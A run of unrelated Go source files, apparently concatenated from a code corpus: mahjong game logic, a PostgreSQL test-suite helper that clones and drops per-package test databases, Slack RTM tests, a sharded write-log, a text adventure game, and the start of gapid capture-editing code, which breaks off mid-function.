				return
			}
		}
		// Otherwise try a run: all three cards must share the suit.
		if !(kaoCard1.IsSameHuaSe(kaoCard2) && kaoCard1.IsSameHuaSe(huCard)) {
			return
		}
		// The leftovers must be 1 or 2 apart so the winning card can sit
		// between or next to them.
		// NOTE(review): huCard's own value is not checked here — presumably
		// the caller guarantees it completes the run; confirm.
		offset := kaoCard1.value - kaoCard2.value
		switch offset {
		case 1, -1, 2, -2:
			result = append(result, NewPattern(PTSZ, cardList, false))
		}
	case 4:
		// Four leftovers must split into two pairs; the winning card
		// upgrades whichever pair it matches into a triplet.
		AAPatterns, _ := SplitToAA_A(kaoCards)
		if len(AAPatterns) == 2 {
			p1 := AAPatterns[0]
			p2 := AAPatterns[1]
			if huCard.IsEqual(p1.cards[0]) {
				result = append(result, NewPattern(PTKan, append(p1.cards, huCard), false))
				result = append(result, NewPattern(PTPair, p2.cards, false))
			} else if huCard.IsEqual(p2.cards[0]) {
				result = append(result, NewPattern(PTKan, append(p2.cards, huCard), false))
				result = append(result, NewPattern(PTPair, p1.cards, false))
			}
		}
	default:
		// Three leftovers can never combine with a single extra card.
		logger.Error("最后的单牌数量只能是1, 2, 4个!")
	}
	return
}
// GetKaoCards returns every card of the pattern except the first one
// equal to card; when no card matches, the result is empty.
func GetKaoCards(pattern *MaJiangPattern, card *MaJiangCard) (kaoCard []*MaJiangCard) {
	kaoCard = make([]*MaJiangCard, 0)
	matchIdx := -1
	for i, c := range pattern.cards {
		if c.IsEqual(card) {
			matchIdx = i
			break
		}
	}
	if matchIdx < 0 {
		return
	}
	kaoCard = append(kaoCard, pattern.cards[:matchIdx]...)
	kaoCard = append(kaoCard, pattern.cards[matchIdx+1:]...)
	return
}
// ChaJiao performs the end-of-round "check for ready" settlement: when
// the player has a best winning pattern group waiting, mark the win as a
// cha-jiao win and run the normal Hu flow for that card.
func (controller *MaJiangController) ChaJiao() {
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	if huPatternGroup, card := player.GetMaxHuOfPatternGroup(); huPatternGroup != nil && card != nil {
		player.isChaJiaoHu = true
		controller.Hu(card)
	}
}
// GetChuPai picks a card to discard: the right-most hand card that is
// not locked against discarding, or nil when none qualifies.
func (controller *MaJiangController) GetChuPai() *MaJiangCard {
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil.")
		return nil
	}
	if len(player.cards) == 0 {
		return nil
	}
	// Scan from the end of the hand toward the front.
	for i := len(player.cards); i > 0; i-- {
		if candidate := player.cards[i-1]; !candidate.IsLockChu() {
			return candidate
		}
	}
	return nil
}
// CheckChu reports whether the player holds a discardable (not locked)
// copy of card.
func (controller *MaJiangController) CheckChu(card *MaJiangCard) bool {
	// Validate state.
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil.")
		return false
	}
	// Find every copy of the requested card in hand.
	chuPais := FindCards(player.cards, card.cType, card.value)
	if len(chuPais) == 0 {
		logger.Error("没有此牌:", ConvertToWord(card))
		return false
	}
	// Any unlocked copy makes the discard legal.
	for _, chuPai := range chuPais {
		if !chuPai.IsLockChu() {
			return true
		}
	}
	logger.Error("没有此牌,或者此牌已经被锁定了!", ConvertToWord(card))
	return false
}
// ChuPai discards card from the player's hand: the first unlocked copy
// is removed, becomes the room's active card, is recorded in the discard
// history, and the win checker / card-count caches are refreshed.
// Returns nil when the card is absent or every copy is locked.
func (controller *MaJiangController) ChuPai(card *MaJiangCard) (finalChuPai *MaJiangCard) {
	// Validate state.
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil.")
		return
	}
	// Find all copies of the requested card in hand.
	chuPais := FindCards(player.cards, card.cType, card.value)
	if chuPais == nil || len(chuPais) <= 0 {
		logger.Error("没有此牌:", ConvertToWord(card))
		return
	}
	// Pick the first copy that is not locked against discarding.
	for _, chuPai := range chuPais {
		if !chuPai.IsLockChu() {
			finalChuPai = chuPai
			break
		}
	}
	if finalChuPai == nil {
		logger.Error("没有此牌,或者此牌已经被锁定了!", ConvertToWord(card))
		return
	}
	// Remove that exact card instance from the hand.
	//PrintCardsS("出了一张牌之前胡更新器里的牌是:", controller.huController.originCards)
	for i, c := range player.cards {
		if c.IsEqual(finalChuPai) && !c.IsLockChu() {
			player.cards = append(player.cards[:i], player.cards[i+1:]...)
			break
		}
	}
	// Publish the discard to the room and the player's discard history.
	player.room.activeCard = finalChuPai
	player.AddChuCard(finalChuPai)
	//PrintCardsS("出了一张牌后手里的牌是:", player.cards)
	//PrintCardsS("原来胡更新器里的手牌是:", controller.huController.originCards)
	// The hand changed, so refresh the win checker...
	controller.huController.UpdateData(player.cards)
	// ...and recompute the cached per-card counts.
	player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
	return
}
// GenerateFinalPatternGroup assembles the player's complete final hand
// for settlement: the already-exposed melds plus, when cards remain in
// hand, either the best winning decomposition (with its closing meld) or
// — failing that — the remaining cards as one loose "single" pattern.
func (controller *MaJiangController) GenerateFinalPatternGroup() (patternGroup *MaJiangPatternGroup) {
	// Validate state.
	player := controller.player
	if player == nil {
		logger.Error("controller.player is nil.")
		return
	}
	// Start from the exposed melds.
	patternsList := make([]*MaJiangPattern, 0)
	patternsList = append(patternsList, player.showPatterns...)
	if player.cards != nil && len(player.cards) > 0 {
		// Prefer the highest-scoring winning decomposition of the hand.
		maxPg, huCard := player.GetMaxHuOfPatternGroup()
		if maxPg != nil && huCard != nil {
			patternsList = append(patternsList, maxPg.patterns...)
			huCard.flag |= cmn.CHu
			//ptype := CalcPatternType(maxPg.kaoCards, huCard)
			lastPatterns := CalcPatternType(maxPg.kaoCards, huCard)
			patternsList = append(patternsList, lastPatterns...)
		} else {
			// No win available: expose the leftovers as loose singles.
			patternsList = append(patternsList, NewPattern(PTSingle, player.cards, false))
		}
	}
	patternGroup = NewPatternGroup(patternsList)
	return
}
|
package testingsuite
import (
"context"
"fmt"
"log"
"math/rand"
"os"
"runtime"
"strings"
"time"
"github.com/transcom/mymove/pkg/random"
"github.com/gobuffalo/envy"
"github.com/gobuffalo/pop/v5"
"github.com/gobuffalo/validate/v3"
"github.com/gofrs/flock"
// Anonymously import lib/pq driver so it's available to Pop
_ "github.com/lib/pq"
)
// charset is the alphabet used to build unique database-name suffixes.
const charset = "abcdefghijklmnopqrstuvwxyz" +
	"0123456789"

//RA Summary: gosec - G404 - Insecure random number source (rand)
//RA: gosec detected use of the insecure package math/rand rather than the more secure cryptographically secure pseudo-random number generator crypto/rand.
//RA: This particular usage is mitigated by sourcing the seed from crypto/rand in order to create the new random number using math/rand.
//RA: Second, as part of the testing suite, the need for a secure random number here is not necessary.
//RA Developer Status: Mitigated
//RA Validator: jneuner@mitre.org
//RA Validator Status: Mitigated
//RA Modified Severity: CAT III
// #nosec G404
var seededRand = rand.New(random.NewCryptoSeededSource())

// fileLock serializes database cloning/teardown across test processes.
var fileLock = flock.New(os.TempDir() + "/server-test-lock.lock")
// StringWithCharset returns a random string of the given length whose
// characters are drawn from charset.
// https://www.calhoun.io/creating-random-strings-in-go/
func StringWithCharset(length int, charset string) string {
	out := make([]byte, length)
	for i := 0; i < length; i++ {
		out[i] = charset[seededRand.Intn(len(charset))]
	}
	return string(out)
}
// PopTestSuite is a suite for testing
type PopTestSuite struct {
	BaseTestSuite
	PackageName
	// origConn connects to the shared template test database used for cloning.
	origConn *pop.Connection
	// lowPrivConn connects to the per-package clone as the application role.
	lowPrivConn *pop.Connection
	// highPrivConn connects to the per-package clone as the migrations role.
	highPrivConn *pop.Connection
	origConnDetails     *pop.ConnectionDetails
	lowPrivConnDetails  *pop.ConnectionDetails
	highPrivConnDetails *pop.ConnectionDetails

	// Enable this flag to avoid the use of the DB_USER_LOW_PRIV and DB_PASSWORD_LOW_PRIV
	// environment variables and instead fall back to the use of a single, high privileged
	// PostgreSQL database role. This role used to commonly be called the "migrations user".
	// However, this grants too many permissions to the database from the application. Therefore,
	// we created a new user with fewer permissions that are used by most tests.
	//
	// There is one type of situation where we still want to use the PostgreSQL role: areas of the
	// code that are testing migrations. In this situation, the following flag can be set to true
	// to enable the use of the role with elevated permissions.
	//
	// For more details, please see https://dp3.atlassian.net/browse/MB-5197
	useHighPrivsPSQLRole bool
}
// dropDB drops the destination database if it exists. The database name
// is interpolated directly into the statement, so destination must be a
// trusted identifier (test code only).
func dropDB(conn *pop.Connection, destination string) error {
	dropQuery := fmt.Sprintf("DROP DATABASE IF EXISTS %s;", destination)
	// Return the Exec error directly instead of the verbose
	// if-err-return-err / return-nil dance.
	return conn.RawQuery(dropQuery).Exec()
}
// cloneDatabase recreates destination as a copy of source using
// PostgreSQL's CREATE DATABASE ... WITH TEMPLATE. Names are interpolated
// directly, so both must be trusted identifiers (test code only).
func cloneDatabase(conn *pop.Connection, source, destination string) error {
	// Drop any stale copy first so the template clone can succeed.
	if dropErr := dropDB(conn, destination); dropErr != nil {
		return dropErr
	}
	return conn.RawQuery(fmt.Sprintf("CREATE DATABASE %s WITH TEMPLATE %s;", destination, source)).Exec()
}
// PackageName represents the project-relative name of a Go package.
type PackageName string

// String returns the package name as a plain string.
func (pn PackageName) String() string {
	return string(pn)
}

// Suffix returns a new PackageName with an underscore and the suffix appended to the end
// suffix should be a snake case string
func (pn PackageName) Suffix(suffix string) PackageName {
	return PackageName(string(pn) + "_" + suffix)
}
// CurrentPackage returns the project-relative name of the caller's package.
//
// "github.com/transcom/mymove/pkg/" is removed from the beginning of the absolute package name, so
// the return value will be e.g. "handlers/internalapi".
func CurrentPackage() PackageName {
	pc, _, _, _ := runtime.Caller(1)
	fullName := runtime.FuncForPC(pc).Name()
	trimmed := strings.Replace(fullName, "github.com/transcom/mymove/pkg/", "", 1)
	// Everything before the first "." is the package path.
	pkg, _, _ := strings.Cut(trimmed, ".")
	return PackageName(pkg)
}
// PopTestSuiteOption is type intended to be used to change a PopTestSuite object.
type PopTestSuiteOption func(*PopTestSuite)

// WithHighPrivPSQLRole is a functional option that can be passed into the NewPopTestSuite
// function to create a PopTestSuite that only uses the privileged SQL connection.
func WithHighPrivPSQLRole() PopTestSuiteOption {
	return func(pts *PopTestSuite) {
		// Mark a flag that indicates that we are only using a single privileged role.
		pts.useHighPrivsPSQLRole = true

		// Disconnect the low privileged connection and replace its connection and connection
		// details with those of the high privileged connection.
		// Panic on failure: a broken test-database setup is unrecoverable.
		if err := pts.lowPrivConn.Close(); err != nil {
			log.Panic(err)
		}
		pts.lowPrivConn = pts.highPrivConn
		pts.lowPrivConnDetails = pts.highPrivConnDetails
	}
}
// NewPopTestSuite returns a new PopTestSuite
//
// Under a cross-process file lock it truncates the template test
// database, clones it into a uniquely-named per-package database, then
// opens a high-privileged (migrations role) and a low-privileged
// (application role) connection to the clone. Any setup failure panics,
// since tests cannot run without a database.
func NewPopTestSuite(packageName PackageName, opts ...PopTestSuiteOption) PopTestSuite {
	// Try to obtain the lock in this method within 10 minutes
	lockCtx, cancel := context.WithTimeout(context.Background(), 600*time.Second)
	defer cancel()

	// Continually check if the lock is available
	_, lockErr := fileLock.TryLockContext(lockCtx, 678*time.Millisecond)
	if lockErr != nil {
		log.Panic(lockErr)
	}

	// Read the required DB_* settings from the environment.
	dbDialect := "postgres"
	dbName, dbNameErr := envy.MustGet("DB_NAME")
	if dbNameErr != nil {
		log.Panic(dbNameErr)
	}
	dbNameTest := envy.Get("DB_NAME_TEST", dbName)
	dbHost, dbHostErr := envy.MustGet("DB_HOST")
	if dbHostErr != nil {
		log.Panic(dbHostErr)
	}
	dbPort, dbPortErr := envy.MustGet("DB_PORT")
	if dbPortErr != nil {
		log.Panic(dbPortErr)
	}
	dbPortTest := envy.Get("DB_PORT_TEST", dbPort)
	dbUser, dbUserErr := envy.MustGet("DB_USER")
	if dbUserErr != nil {
		log.Panic(dbUserErr)
	}
	dbUserLowPriv, dbUserLowPrivErr := envy.MustGet("DB_USER_LOW_PRIV")
	if dbUserLowPrivErr != nil {
		log.Panic(dbUserLowPrivErr)
	}
	dbPassword, dbPasswordErr := envy.MustGet("DB_PASSWORD")
	if dbPasswordErr != nil {
		log.Panic(dbPasswordErr)
	}
	dbPasswordApp, dbPasswordAppErr := envy.MustGet("DB_PASSWORD_LOW_PRIV")
	if dbPasswordAppErr != nil {
		log.Panic(dbPasswordAppErr)
	}
	dbSSLMode := envy.Get("DB_SSL_MODE", "disable")
	dbOptions := map[string]string{
		"sslmode": dbSSLMode,
	}

	// Connect to the template test database as the privileged user.
	log.Printf("package %s is attempting to connect to database %s", packageName.String(), dbNameTest)
	origConnDetails := pop.ConnectionDetails{
		Dialect:  dbDialect,
		Driver:   "postgres",
		Database: dbNameTest,
		Host:     dbHost,
		Port:     dbPortTest,
		User:     dbUser,
		Password: dbPassword,
		Options:  dbOptions,
	}
	origConn, origConnErr := pop.NewConnection(&origConnDetails)
	if origConnErr != nil {
		log.Panic(origConnErr)
	}
	if openErr := origConn.Open(); openErr != nil {
		log.Panic(openErr)
	}

	// Doing this before cloning should pre-clean the DB for all tests
	log.Printf("attempting to truncate the database %s", dbNameTest)
	errTruncateAll := origConn.TruncateAll()
	if errTruncateAll != nil {
		log.Panicf("failed to truncate database '%s': %#v", dbNameTest, errTruncateAll)
	}

	// Clone the template into a uniquely-named per-package database.
	uniq := StringWithCharset(6, charset)
	dbNamePackage := fmt.Sprintf("%s_%s_%s", dbNameTest, strings.Replace(packageName.String(), "/", "_", -1), uniq)
	log.Printf("attempting to clone database %s to %s... ", dbNameTest, dbNamePackage)
	if err := cloneDatabase(origConn, dbNameTest, dbNamePackage); err != nil {
		log.Panicf("failed to clone database '%s' to '%s': %#v", dbNameTest, dbNamePackage, err)
	}
	log.Println("success")

	// disconnect from the original DB
	if err := origConn.Close(); err != nil {
		log.Panic(err)
	}

	// Release the lock so other tests can clone the DB
	if err := fileLock.Unlock(); err != nil {
		log.Panic(err)
	}

	log.Printf("package %s is attempting to connect to database %s", packageName.String(), dbNamePackage)
	// Prepare a new connection to the temporary database with the same PostgreSQL role privileges
	// as what the migrations task will have when running migrations. These privileges will be
	// higher than the role that runs application.
	highPrivConnDetails := pop.ConnectionDetails{
		Dialect:  dbDialect,
		Driver:   "postgres",
		Database: dbNamePackage,
		Host:     dbHost,
		Port:     dbPortTest,
		User:     dbUser,
		Password: dbPassword,
		Options:  dbOptions,
	}
	highPrivsConn, highPrivsConnErr := pop.NewConnection(&highPrivConnDetails)
	if highPrivsConnErr != nil {
		log.Panic(highPrivsConnErr)
	}
	if openErr := highPrivsConn.Open(); openErr != nil {
		log.Panic(openErr)
	}

	// Prepare a new connection to the temporary database with the same PostgreSQL role privileges
	// as what the application will have when running the server. These privileges will be lower
	// than the role that runs database migrations.
	lowPrivConnDetails := pop.ConnectionDetails{
		Dialect:  dbDialect,
		Driver:   "postgres",
		Database: dbNamePackage,
		Host:     dbHost,
		Port:     dbPortTest,
		User:     dbUserLowPriv,
		Password: dbPasswordApp,
		Options:  dbOptions,
	}
	lowPrivsConn, lowPrivsConnErr := pop.NewConnection(&lowPrivConnDetails)
	if lowPrivsConnErr != nil {
		log.Panic(lowPrivsConnErr)
	}
	if openErr := lowPrivsConn.Open(); openErr != nil {
		log.Panic(openErr)
	}

	// Create a standardized PopTestSuite object.
	pts := &PopTestSuite{
		lowPrivConn:         lowPrivsConn,
		highPrivConn:        highPrivsConn,
		origConn:            origConn,
		lowPrivConnDetails:  &lowPrivConnDetails,
		highPrivConnDetails: &highPrivConnDetails,
		origConnDetails:     &origConnDetails,
		PackageName:         packageName,
	}

	// Apply the user-supplied options to the PopTestSuite object.
	for _, opt := range opts {
		opt(pts)
	}

	return *pts
}
// DB returns a db connection
// (the low-privileged application-role connection; schema-level
// operations go through the high-privileged helpers instead).
func (suite *PopTestSuite) DB() *pop.Connection {
	return suite.lowPrivConn
}
// Truncate deletes all data from the specified tables, cascading to
// dependent rows; it stops at the first failing table.
func (suite *PopTestSuite) Truncate(tables []string) error {
	for _, table := range tables {
		stmt := fmt.Sprintf("TRUNCATE TABLE %s CASCADE", table)
		err := suite.highPrivConn.RawQuery(stmt).Exec()
		if err != nil {
			return err
		}
	}
	return nil
}
// TruncateAll deletes all data from all tables that are owned by the user connected to the
// database.
// Uses the high-privileged connection so every table is reachable.
func (suite *PopTestSuite) TruncateAll() error {
	return suite.highPrivConn.TruncateAll()
}
// MustSave validates and saves model on the low-privileged connection,
// failing the test on any error or validation error.
func (suite *PopTestSuite) MustSave(model interface{}) {
	t := suite.T()
	t.Helper()

	verrs, err := suite.lowPrivConn.ValidateAndSave(model)
	// Report through the captured t so t.Helper() applies to the failure
	// location (the original mixed t with fresh suite.T() calls).
	if err != nil {
		t.Errorf("Errors encountered saving %v: %v", model, err)
	}
	if verrs.HasAny() {
		t.Errorf("Validation errors encountered saving %v: %v", model, verrs)
	}
}
// MustCreate validates and creates model on the given connection,
// failing the test on any error or validation error.
func (suite *PopTestSuite) MustCreate(db *pop.Connection, model interface{}) {
	t := suite.T()
	t.Helper()

	verrs, err := db.ValidateAndCreate(model)
	// Report through the captured t so t.Helper() applies to the failure
	// location (the original mixed t with fresh suite.T() calls).
	if err != nil {
		t.Errorf("Errors encountered creating %v: %v", model, err)
	}
	if verrs.HasAny() {
		t.Errorf("Validation errors encountered creating %v: %v", model, verrs)
	}
}
// MustDestroy deletes model via the low-privileged connection, failing
// the test on error.
func (suite *PopTestSuite) MustDestroy(model interface{}) {
	t := suite.T()
	t.Helper()

	// Report through the captured t so t.Helper() applies to the failure
	// location (the original mixed t with a fresh suite.T() call).
	if err := suite.lowPrivConn.Destroy(model); err != nil {
		t.Errorf("Errors encountered destroying %v: %v", model, err)
	}
}
// NoVerrs asserts that verrs contains no validation errors, printing
// them to stdout when the assertion fails.
func (suite *PopTestSuite) NoVerrs(verrs *validate.Errors) bool {
	if suite.False(verrs.HasAny()) {
		return true
	}
	fmt.Println(verrs.String())
	return false
}
// TearDown runs the teardown for step for the suite
// Important steps are to close open DB connections and drop the DB
func (suite *PopTestSuite) TearDown() {
	// disconnect from the package DB connections
	if err := suite.lowPrivConn.Close(); err != nil {
		log.Panic(err)
	}
	if err := suite.highPrivConn.Close(); err != nil {
		log.Panic(err)
	}

	// Try to obtain the lock in this method within 10 minutes
	lockCtx, cancel := context.WithTimeout(context.Background(), 600*time.Second)
	defer cancel()

	// Continually check if the lock is available
	_, lockErr := fileLock.TryLockContext(lockCtx, 678*time.Millisecond)
	if lockErr != nil {
		log.Panic(lockErr)
	}

	// reconnect to the original DB
	origConn, origConnErr := pop.NewConnection(suite.origConnDetails)
	if origConnErr != nil {
		log.Panic(origConnErr)
	}
	if openErr := origConn.Open(); openErr != nil {
		log.Panic(openErr)
	}

	// Remove the package DB
	// (the low-priv details carry the per-package clone's name).
	if err := dropDB(origConn, (*suite.lowPrivConnDetails).Database); err != nil {
		log.Panic(err)
	}

	// disconnect from the original DB
	if err := origConn.Close(); err != nil {
		log.Panic(err)
	}

	// Release the lock so other tests can clone the DB
	if err := fileLock.Unlock(); err != nil {
		log.Panic(err)
	}
}
|
package rtmapi
import (
"encoding/json"
"github.com/oklahomer/golack/v2/event"
"strings"
"testing"
)
// TestMarshalPingEvent verifies that a Ping encodes to JSON containing
// its "ping" type marker.
func TestMarshalPingEvent(t *testing.T) {
	ping := &Ping{
		OutgoingEvent: OutgoingEvent{
			ID:         1,
			TypedEvent: event.TypedEvent{Type: "ping"},
		},
	}

	val, err := json.Marshal(ping)
	if err != nil {
		// Typo fix: "occured" -> "occurred".
		t.Fatalf("error occurred while encoding. %s.", err.Error())
	}

	if !strings.Contains(string(val), "ping") {
		t.Fatalf(`returned string doesn't contain "ping". %s.`, string(val))
	}
}
// TestUnmarshalPingEvent verifies that a ping JSON payload decodes into
// a Ping with its type and id populated.
func TestUnmarshalPingEvent(t *testing.T) {
	input := `{"type": "ping", "id": 123}`
	ping := &Ping{}

	err := json.Unmarshal([]byte(input), ping)
	if err != nil {
		t.Errorf("error on Unmarshal. %s.", err.Error())
		return
	}

	if ping.Type != "ping" {
		t.Errorf("something is wrong with unmarshaled result. %#v.", ping)
	}
	if ping.ID != 123 {
		t.Errorf("unmarshaled id is wrong %d. expecting %d.", ping.ID, 123)
	}
}
// TestNewOutgoingMessage verifies the constructor copies channel and
// text into the message.
func TestNewOutgoingMessage(t *testing.T) {
	targetChannel := event.ChannelID("channel")
	text := "dummy message"

	m := NewOutgoingMessage(targetChannel, text)

	if m.ChannelID != targetChannel {
		t.Errorf("Passed channelID is not set: %s.", m.ChannelID)
	}
	if m.Text != text {
		t.Errorf("Passed message is not set: %s.", m.Text)
	}
}
// TestOutgoingMessage_WithThreadTimeStamp verifies the builder stores
// the given thread timestamp on the message.
func TestOutgoingMessage_WithThreadTimeStamp(t *testing.T) {
	ts := &event.TimeStamp{}
	m := &OutgoingMessage{}

	m.WithThreadTimeStamp(ts)

	if m.ThreadTimeStamp != ts {
		t.Errorf("Passed timestamp is not set: %s.", m.ThreadTimeStamp)
	}
}
|
package database
import (
"encoding/gob"
"log"
"os"
"sync"
)
// Writelog is one shard of the write-log index: a map from key to value
// (write ID -> pointer, or the inverse for the inverted shards).
type Writelog struct {
	Index map[int64]int64
}

// ConcurrentWriteLog is a sharded, mutex-guarded bidirectional mapping
// between write IDs and pointers.
type ConcurrentWriteLog struct {
	// logs and inverted together form a bimap; shard i of both slices is
	// guarded by mutexes[i].
	Logs        []Writelog
	Inverted    []Writelog
	Concurrency int64
	mutexes     []sync.RWMutex
}

// add records the writeId -> ptr mapping and its inverse.
// Keys are assumed non-negative: a negative writeId or ptr would yield a
// negative shard index and panic.
// (Fixes: receiver renamed from the inconsistent "ci" to "cwl"; the
// local previously named "log" shadowed the imported log package.)
func (cwl *ConcurrentWriteLog) add(writeId int64, ptr int64) {
	i := writeId % cwl.Concurrency
	shard := cwl.Logs[i]
	cwl.mutexes[i].Lock()
	shard.Index[writeId] = ptr
	cwl.mutexes[i].Unlock()

	j := ptr % cwl.Concurrency
	cwl.mutexes[j].Lock()
	defer cwl.mutexes[j].Unlock()
	inverted := cwl.Inverted[j]
	inverted.Index[ptr] = writeId
}

// get returns the pointer recorded for writeId, and whether it exists.
func (cwl *ConcurrentWriteLog) get(writeId int64) (int64, bool) {
	i := writeId % cwl.Concurrency
	shard := cwl.Logs[i]
	cwl.mutexes[i].RLock()
	defer cwl.mutexes[i].RUnlock()
	val, ok := shard.Index[writeId]
	return val, ok
}

// getWriteId returns the write ID recorded for ptr, and whether it exists.
func (cwl *ConcurrentWriteLog) getWriteId(ptr int64) (int64, bool) {
	i := ptr % cwl.Concurrency
	inverted := cwl.Inverted[i]
	cwl.mutexes[i].RLock()
	defer cwl.mutexes[i].RUnlock()
	val, ok := inverted.Index[ptr]
	return val, ok
}

// NewWriteLog returns a ConcurrentWriteLog with the given number of
// shards, each with an empty forward and inverted map.
func NewWriteLog(concurrency int64) *ConcurrentWriteLog {
	n := int(concurrency)
	logs := make([]Writelog, 0, n)
	inverted := make([]Writelog, 0, n)
	for i := 0; i < n; i++ {
		logs = append(logs, Writelog{Index: make(map[int64]int64)})
		inverted = append(inverted, Writelog{Index: make(map[int64]int64)})
	}
	return &ConcurrentWriteLog{
		Logs:        logs,
		Inverted:    inverted,
		mutexes:     make([]sync.RWMutex, n),
		Concurrency: concurrency,
	}
}
// save gob-encodes the write log to location, returning success and any
// error. Failures are logged and returned to the caller; the original
// used log.Fatalf, which calls os.Exit and made the error returns
// unreachable, defeating the (bool, error) contract.
func (cwl *ConcurrentWriteLog) save(location string) (bool, error) {
	file, err := os.Create(location)
	if err != nil {
		log.Printf("Unable to open index file %v", err)
		return false, err
	}
	defer file.Close()

	if err := gob.NewEncoder(file).Encode(cwl); err != nil {
		log.Printf("Unable to encode data to file %v", err)
		return false, err
	}
	return true, nil
}
// LoadWriteLog reads a gob-encoded ConcurrentWriteLog from location and
// rebuilds the unexported mutex shards (gob does not serialize
// unexported fields). Failures are logged and returned; the original
// used log.Fatalf, which exits the process and made the error returns
// unreachable.
func LoadWriteLog(location string) (*ConcurrentWriteLog, error) {
	// os.Open is the read-only equivalent of the previous
	// os.OpenFile(location, os.O_RDONLY, 0666).
	file, err := os.Open(location)
	if err != nil {
		log.Printf("Unable to open file %v", err)
		return nil, err
	}
	defer file.Close()

	writelog := new(ConcurrentWriteLog)
	if err := gob.NewDecoder(file).Decode(writelog); err != nil {
		log.Printf("Unable to read index file %v", err)
		return nil, err
	}
	// Recreate one mutex per shard; zero-value RWMutexes are ready to use.
	writelog.mutexes = make([]sync.RWMutex, int(writelog.Concurrency))
	return writelog, nil
}
|
package adventure
import (
"encoding/json"
"fmt"
"net/http"
"os"
"strconv"
"github.com/labstack/echo/v4"
)
type (
	// Adventure maps arc names to their story arcs.
	Adventure map[string]Arc
	// Arc is one node of the story graph: a titled sequence of story
	// paragraphs plus the options leading to other arcs.
	Arc struct {
		Title   string
		Story   []string
		Options []ArcOption
	}
	// ArcOption is a single player choice: the text shown to the player and
	// the name of the arc it leads to.
	ArcOption struct {
		Text string
		Arc  string
	}
	// Game holds the CLI game state: the loaded adventure and the name of
	// the arc currently being played.
	Game struct {
		Adventure  Adventure
		CurrentArc string
	}
	// WebGame serves an adventure over HTTP, rendering DefaultArc when no
	// arc is named in the request.
	WebGame struct {
		Adventure  Adventure
		DefaultArc string
	}
)
// LoadAdventure reads the file at path and decodes it as a JSON adventure
// definition (a map of arc name to Arc).
func LoadAdventure(path string) (Adventure, error) {
	f, err := os.Open(path)
	if err != nil {
		return nil, err
	}
	defer f.Close()
	adv := make(Adventure)
	if err := json.NewDecoder(f).Decode(&adv); err != nil {
		return nil, err
	}
	return adv, nil
}
// PlayCli runs the adventure as an interactive terminal game: it prints the
// current arc's title, story and options, then prompts for a choice, looping
// until the player quits. Exits the process if CurrentArc is unknown.
func (g *Game) PlayCli() {
	playing := true
	for playing {
		arc, ok := g.Adventure[g.CurrentArc]
		if !ok {
			fmt.Println("unknown adventure arc, how did you get here?")
			os.Exit(1)
		}
		// fmt.Println(x, "\n") is a go-vet "redundant newline" defect and
		// printed a stray trailing space; print the intended blank line
		// explicitly instead.
		fmt.Printf("%s\n\n", arc.Title)
		for _, p := range arc.Story {
			fmt.Printf("%s\n\n", p)
		}
		for i, o := range arc.Options {
			// Options are presented 1-based for the player.
			fmt.Printf("%d: %s\n", i+1, o.Text)
		}
		fmt.Println("(q to quit)")
		playing = g.handleInput()
	}
}
// handleInput prompts on stdin until it reads either a quit command or a
// valid 1-based option number. A valid number advances CurrentArc to the
// chosen option's arc and returns true; a quit command returns false.
func (g *Game) handleInput() bool {
	for {
		fmt.Printf("What will you do? ")
		var choice string
		fmt.Scanf("%s", &choice)
		if choice == "q" || choice == "quit" || choice == "exit" {
			return false
		}
		options := g.Adventure[g.CurrentArc].Options
		n, err := strconv.Atoi(choice)
		if err != nil || n <= 0 || n > len(options) {
			fmt.Println("Bad choice...")
			continue
		}
		g.CurrentArc = options[n-1].Arc
		return true
	}
}
// HandleDefaultArc returns a handler that renders the adventure's starting
// arc (DefaultArc) with the story.html template.
func (g *WebGame) HandleDefaultArc() echo.HandlerFunc {
	return func(c echo.Context) error {
		start := g.Adventure[g.DefaultArc]
		return c.Render(http.StatusOK, "story.html", start)
	}
}
// HandleArc returns a handler that renders the arc named by the "arc" route
// parameter, or responds 404 when no such arc exists.
func (g *WebGame) HandleArc() echo.HandlerFunc {
	return func(c echo.Context) error {
		name := c.Param("arc")
		arc, ok := g.Adventure[name]
		if !ok {
			return echo.ErrNotFound
		}
		return c.Render(http.StatusOK, "story.html", arc)
	}
}
|
// Copyright (C) 2017 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package resolve
import (
"context"
"fmt"
"reflect"
"github.com/google/gapid/core/data/deep"
"github.com/google/gapid/core/data/dictionary"
"github.com/google/gapid/core/memory/arena"
"github.com/google/gapid/gapis/api"
"github.com/google/gapid/gapis/capture"
"github.com/google/gapid/gapis/database"
"github.com/google/gapid/gapis/messages"
"github.com/google/gapid/gapis/service"
"github.com/google/gapid/gapis/service/path"
)
// Set creates a copy of the capture referenced by the request's path, but
// with the object, value or memory at p replaced with v. The path returned is
// identical to p, but with the base changed to refer to the new capture.
func Set(ctx context.Context, p *path.Any, v interface{}, r *path.ResolveConfig) (*path.Any, error) {
	resolvable := &SetResolvable{Path: p, Value: service.NewValue(v), Config: r}
	obj, err := database.Build(ctx, resolvable)
	if err != nil {
		return nil, err
	}
	return obj.(*path.Any), nil
}
// Resolve implements the database.Resolver interface.
func (r *SetResolvable) Resolve(ctx context.Context) (interface{}, error) {
	ctx = SetupContext(ctx, path.FindCapture(r.Path.Node()), r.Config)
	a := arena.New()
	// Convert the service-layer value into its internal representation
	// before applying the change.
	internal, err := serviceToInternal(a, r.Value.Get())
	if err != nil {
		return nil, err
	}
	node, err := change(ctx, a, r.Path.Node(), internal, r.Config)
	if err != nil {
		return nil, err
	}
	return node.Path(), nil
}
// change returns a path equivalent to p, but rooted at a new capture in which
// the value addressed by p has been replaced with val. Leaf path kinds
// (Parameter, Field, ArrayIndex, MapIndex) clone their parent's value, mutate
// the clone, and recurse on the parent; Command and resource paths rebuild
// the capture's command list or resources directly. Immutable path kinds
// (Report, Commands, State) return an error.
func change(ctx context.Context, a arena.Arena, p path.Node, val interface{}, r *path.ResolveConfig) (path.Node, error) {
	switch p := p.(type) {
	case *path.Report:
		return nil, fmt.Errorf("Reports are immutable")
